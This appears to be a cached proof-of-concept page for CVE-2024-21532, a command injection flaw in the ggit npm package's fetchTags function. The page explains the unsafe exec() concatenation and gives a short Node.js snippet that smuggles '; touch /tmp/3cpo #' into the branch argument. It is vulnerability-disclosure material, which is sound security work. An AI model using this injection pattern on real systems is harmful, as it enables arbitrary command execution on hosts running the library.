CVE-2024-21532 PoC — ggit 安全漏洞

Source

https://github.com/lirantal/CVE-2024-21532-PoC-ggit

Associated Vulnerability

Title:ggit 安全漏洞 (CVE-2024-21532)
Description:ggit是Gleb Bahmutov个人开发者的一个工具。 ggit存在安全漏洞，该漏洞源于允许用户输入要获取的分支，容易受到命令注入攻击。

Description

CVE-2024-21532 PoC ggit

Readme

# CVE-2024-21532 Command Injection vulnerability in ggit

`ggit` describes itself as:

```
Local promise-returning git command wrappers
```

Resources: 
 * Project's GitHub source code: https://github.com/bahmutov/ggit
 * Project's npm package: https://www.npmjs.com/package/ggit

Article write-up on this vulnerability: https://nodejs-security.com/blog/flawed-git-promises-library-on-npm-leads-to-command-injection-vulnerability

## Background on exploitation

I'm reporting a Command Injection vulnerability in `ggit` npm package.

This vulnerability manifests with the library's `fetchTags(branch)` API,
which allows user input to specify the branch to be fetched and then concatenates
this string along with a git command which is then passed to the unsafe `exec()`
Node.js child process API.

## Exploit

1. Install `ggit@2.4.12` or earlier
2. Establish the following POC:

```js
const fetchTags = require("ggit").fetchTags;
fetchTags("; touch /tmp/3cpo #").then(function () {
  // should be same as running command
  // git pull origin --tags
  console.log("done");
});
```

3. Observe new file created on disk at `/tmp/3cpo`

# Author

Liran Tal

File Snapshot


 [4.0K]  /data/pocs/03d7272e1b31acfa53e40d8934e764b648a24b36
└── [1.1K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!